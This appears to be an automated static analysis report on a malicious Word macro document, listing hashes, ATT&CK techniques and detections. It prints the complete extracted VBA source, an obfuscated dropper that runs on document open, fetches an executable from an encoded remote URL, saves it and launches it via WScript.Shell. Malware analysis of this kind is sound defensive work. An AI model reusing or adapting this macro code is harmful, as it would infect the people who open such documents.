Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8e11c8d236551e7d…

MALICIOUS

Office (OLE)

Size: 184.0 KB
Created: 2016-05-18 22:57:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 4d1cbfc85985f12621f0f93e585c4097
SHA-1: d5c8828550bdc351411d1eecfaa0a6a8a4318831
SHA-256: 8e11c8d236551e7d0a52485a2897389934235e41606fe7af6b26ee30086b8936
Risk Score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to interact with the system, likely to download and execute a secondary payload. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports its role as a dropper.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim WuEpb As String
    Set mWwoXQA = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim fExpSbV As Boolean, RKLHuagrZb As Integer
    Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    Set ZOFvQisC = KfEVUAz
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String)
    CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim LzHAxP As Integer
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8849 bytes
SHA-256: 88686842451e0e5a60f724d8e2ef97067b2bb69f3fac64499ef7061fed15862e
Detection: ClamAV: No threats found
Obfuscation or payload: likely
173 of 252 identifiers look randomly generated (e.g. 'j4uHtnJoy8oycNRtefhPmcMgCDf4ju1') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VpfjMw() As Integer
NddjA
If XBccwj(5601, "j4uHtnJoy8oycNRtefhPmcMgCDf4ju1") Then
kdFtL
Else
nuvzfFK
End If
VpfjMw = 8139
End Function
Private Sub Document_Open()
Dim LzHAxP As Integer
Dim UsohTS As Integer
EPrGkzHu.QYDdgP
End Sub
Private Sub KGvnuPk()
mJgHQ False, False, 4238
gcLIjQ True
End Sub

Attribute VB_Name = "aFCZE"
Private Sub wfvYYqQI()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "x1DnQDF2czp6Rx9jrX"
End Sub
Public Function ZOFvQisC() As Object
Dim fExpSbV As Boolean, RKLHuagrZb As Integer
Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set ZOFvQisC = KfEVUAz
End Function
Public Function mWwoXQA() As Object
Dim WuEpb As String
Set mWwoXQA = CreateObject("WScript.Shell")
End Function
Public Function YdTUsFm() As Object
kSeUwKWLwH = 3434
Set YdTUsFm = CreateObject("ADODB.Stream")
End Function
Private Sub MCtMgah()
KbxYhbaay
AvUSfTJh "8EbN8KX3hIFQHcDIlQI", "o52tnaqhX64Zh0y4r", False
ZOkaSukV
End Sub

Attribute VB_Name = "BeYvRF"
Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String)
CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu
End Sub
Public Sub DJVPI(ByVal pxDRulh As Object, ByVal jrBWdEm As Integer, ByVal NDAsEvilP As String, ByVal yCQGVhevt As String)
CallByName pxDRulh, NDAsEvilP, 1
End Sub
Public Function UbGPuJ(ByVal RREzJxxtD As String, ByVal VIrHfCIYF As String, ByVal ISVPXW As Object) As Variant
Set UbGPuJ = CallByName(ISVPXW, VIrHfCIYF, 2, RREzJxxtD)
End Function
Public Sub NKifxPpV(ByVal VSjVUF As Variant, ByVal DBwIkBro As String, ByVal ajVZXoIqG As Variant, ByVal bXMjSuTE As Object)
CallByName bXMjSuTE, DBwIkBro, 1, ajVZXoIqG, VSjVUF
End Sub
Private Function uYeVPhy(ByVal OCtJVgLy As String, ByVal bDPzlY As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "zc5pscFjT2S8tZnwd", 3675
SlRmBd
End If
SCMoUyqWX
uYeVPhy = "e7HlC4v2sDVjbiov99wsrMoR"
End Function
Public Sub NqquGP(ByVal hVeELAyr As Variant, ByVal bMzMVuEupm As String, ByVal fbRAcm As Object, ByVal EzeHNehRF As Integer, ByVal pNFJaMR As String)
Dim xeEwuF As String
Dim yKNzUJers As String
CallByName fbRAcm, pNFJaMR, 1, hVeELAyr
End Sub
Public Function nTIJawB(ByVal ueBQcrWS As String, ByVal eMHLXuUVG As Object) As Variant
nTIJawB = CallByName(eMHLXuUVG, ueBQcrWS, 2)
End Function
Public Sub xVkQjut(ByVal FygbNsksM As Variant, ByVal pmVJAx As String, ByVal LDukdsJJjO As Object)
CallByName LDukdsJJjO, pmVJAx, 4, FygbNsksM
End Sub

Attribute VB_Name = "EGYbhgTTB"
Private Sub moKxvi()
OfSXF "9Obf1MXW8x08GTl7WT4IE", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "YU5a36sdqMf4gGhwRX", "t4xljyxgjyBYvwJ2FIasgwNg"
End If
End Sub
Public Function zkiLABPjC(ByVal rXqOy As String, ByVal ZPcQozUV As String) As String
Dim EbfjMcsfZd As Boolean
Dim oVkYhfM As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For ZlCVbbs = 1 To VbcouufHpG.gleSLxNG(3700, "KWCmiDd1IBm4bsky08t2", ZPcQozUV)
EbfjMcsfZd = VbcouufHpG.RkIzvdKt(rXqOy, "EbC2mO1OrtfR6CBcYOmVrvR6oajt", VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "UfMcc6HnOgr6Karnf2NGAmj"))
sEodtQL = "4smDlgVxUxh1eWCFA7Hkvl"
If Not EbfjMcsfZd Then
zkiLABPjC = VbcouufHpG.DYXpv(zkiLABPjC, VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "4o6PvsgUgKWGsP9GSQYDH20ja"))
End If
BhvAq = "STSBDuZZ4OAYHjaNd5S"
Next
End Function
Private Function rmdMD(ByVal lvLjb As Boolean) As String
mGpHG "2AkTeLJsmfzcvjHC7cRex", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "htwEQMGrWzYauaLjxuD51O", 3269, False
aEcIpbKw True
wVbejPo
rmdMD = "UrN4qbO1m0X5zG5tm41srs98yse4b8r"
End Function

Attribute VB_Name = "EPrGkzHu"
Private Function KPCRpu() As String
KPCRpu = EGYbhgTTB.zkiLABPjC("3oLDj9", "P3R39OCLE3So9S")
End Function
Private Function FHqUGHp() As String
FHqUGHp = "6LLnWHRLeRqz2rACK3OC6975dmTgw"
End Function
Private Function KzMWjtPR() As String
KzMWjtPR = EGYbhgTTB.zkiLABPjC("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
Private Function qdFqRQhX() As String
Dim akMCEUJWT As Integer, GJjGE As String
qdFqRQhX = EGYbhgTTB.zkiLABPjC("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
Private Function XRJdvmMod() As String
bLjwgJSUR = "2GcxUxHGeeqAk5dRzkW"
XRJdvmMod = EGYbhgTTB.zkiLABPjC("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
Private Function bCFMzogl() As String
bCFMzogl = LMdEaw
End Function
Private Sub ksHBEmIcM(ByVal rHdYNX As String, ByVal gfvUXo As String, ByVal ISVgmGxq As Variant, ByVal sxHKvmRjs As String)
Dim idRkI As String
Dim NJQxMIoS As String
IaFbCbvQf = 5255
Set HDwZLwsW = aFCZE.YdTUsFm
BeYvRF.xVkQjut 1, EGYbhgTTB.zkiLABPjC("LBoZgmq/", "mTZypoeq"), HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni"), tqhjynsHjX
BeYvRF.NqquGP ISVgmGxq, tqhjynsHjX, HDwZLwsW, 7897, nStkt
BeYvRF.NKifxPpV 2, EGYbhgTTB.zkiLABPjC("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), rHdYNX, HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("KMwhE6", "6C6lo6Eswe"), tqhjynsHjX
End Sub
Private Function IhlIMYNeV() As String
IhlIMYNeV = EGYbhgTTB.zkiLABPjC("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
Private Function WDMQt() As String
QhJzBSkuli = 9116
WDMQt = EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni")
End Function
Private Sub JBvHoKbqX()
Dim EHMWLhGy As Integer
On Error GoTo jZtTFePDmI
TNXSaJ bCFMzogl, whxVtLP
nHFskkviX = "CIqqAGvbDWl6WstTB"
AcwENd whxVtLP, "tTZOxcNDYIQY4DtncOF", False
Exit Sub
jZtTFePDmI:
End Sub
Private Sub TNXSaJ(ByVal ObzgdkHr As String, ByVal YsneAXqlUt As String)
Set VVpSmZGOkG = aFCZE.ZOFvQisC
BeYvRF.PnhePatYp 6693, False, EGYbhgTTB.zkiLABPjC("KAgQjJ2L", "GKLEAT"), VVpSmZGOkG, ObzgdkHr, 9594, WDMQt
LfPYoESsUK = False
BeYvRF.NKifxPpV EGYbhgTTB.zkiLABPjC("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), IhlIMYNeV, KzMWjtPR, VVpSmZGOkG
eNLxFz = "P6nMhz83z3IpEfN9Fo2PSP9mXTRK3F"
BeYvRF.DJVPI VVpSmZGOkG, 8172, EGYbhgTTB.zkiLABPjC("pZhU24tr", "SZte4ndZ"), "q0p8Ub3rshCrQjDSx5eeGycByLyw"
ksHBEmIcM YsneAXqlUt, "1lJl0pKbN2dMZTH7Zt8dL7ROgX6fDEQD", BeYvRF.nTIJawB(EGYbhgTTB.zkiLABPjC("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), VVpSmZGOkG), "5kiXE2vicHqpXXDAo1j5B6"
End Sub
Private Function tWEpW() As String
tWEpW = EGYbhgTTB.zkiLABPjC("HqVgy4nv", "Evxvency")
End Function
Private Function tqhjynsHjX() As String
usNmDIucf = "Jss7PasM9VAjJRtDHa3zJ8u"
tqhjynsHjX = "yupHqjNM6l8zqfIHH2kt9X8aSCR17G"
End Function
Private Function WBbee(ByVal ajrLip As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
WBbee = "ArdJdLW6VWH5LTazdUDbs"
End Function
Private Function vpQfEefLZ(ByVal LAcWYGPSDO As String) As String
Dim YdfgkbO As String
COovMr = "DAIdRdDYbbwjjTLoFNQMEn8"
Set JjPWUaL = BeYvRF.UbGPuJ(KPCRpu, XRJdvmMod, aFCZE.mWwoXQA)
vpQfEefLZ = JjPWUaL(LAcWYGPSDO)
End Function
Private Function LMdEaw() As String
LMdEaw = EGYbhgTTB.zkiLABPjC("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
Public Sub QYDdgP()
DSFWQ = 8775
JBvHoKbqX
End Sub
Private Function nStkt() As String
nStkt = EGYbhgTTB.zkiLABPjC("0dYXgI8ls", "lWrliYtgIe")
End Function
Private Sub AcwENd(ByVal CmtMtSSV As String, ByVal KbUrADqZEH As String, ByVal VejaggyhE As Boolean)
Dim wwLQLRaLTE As Integer
Dim hwtAkFuBQg As String
BeYvRF.NqquGP CmtMtSSV, FHqUGHp, aFCZE.mWwoXQA, 7897, tWEpW
End Sub
Private Function whxVtLP() As String
Dim TTxTguQk As Boolean, rfrVlXygqD As String
NzmDVOpD = False
whxVtLP = vpQfEefLZ(EGYbhgTTB.zkiLABPjC("IV6mZvAC", "CTECMmPI")) & qdFqRQhX
End Function

Attribute VB_Name = "VbcouufHpG"
Public Function RkIzvdKt(ByVal ApLkqQS As String, ByVal zajYYZ As String, ByVal AtzWDJa As String) As Boolean
Dim MDXrDg As Boolean
RkIzvdKt = InStr(1, ApLkqQS, AtzWDJa)
End Function
Public Function ChuZLn(ByVal QNcst As String, ByVal EPQuVyD As Integer, ByVal WWSdKLmkrP As Integer, ByVal EaGdHX As String) As String
Dim XgCALH As String
ChuZLn = Mid(QNcst, EPQuVyD, 1)
End Function
Public Function gleSLxNG(ByVal Mnxsav As Integer, ByVal hXFeORK As String, ByVal fLmgthl As String) As Integer
Dim iBnLD As Integer
gleSLxNG = Len(fLmgthl)
End Function
Public Function DYXpv(ByVal PcNXnoheu As String, ByVal jxdZSHlNT As String) As String
Dim qgGLn As String
DYXpv = PcNXnoheu & jxdZSHlNT
End Function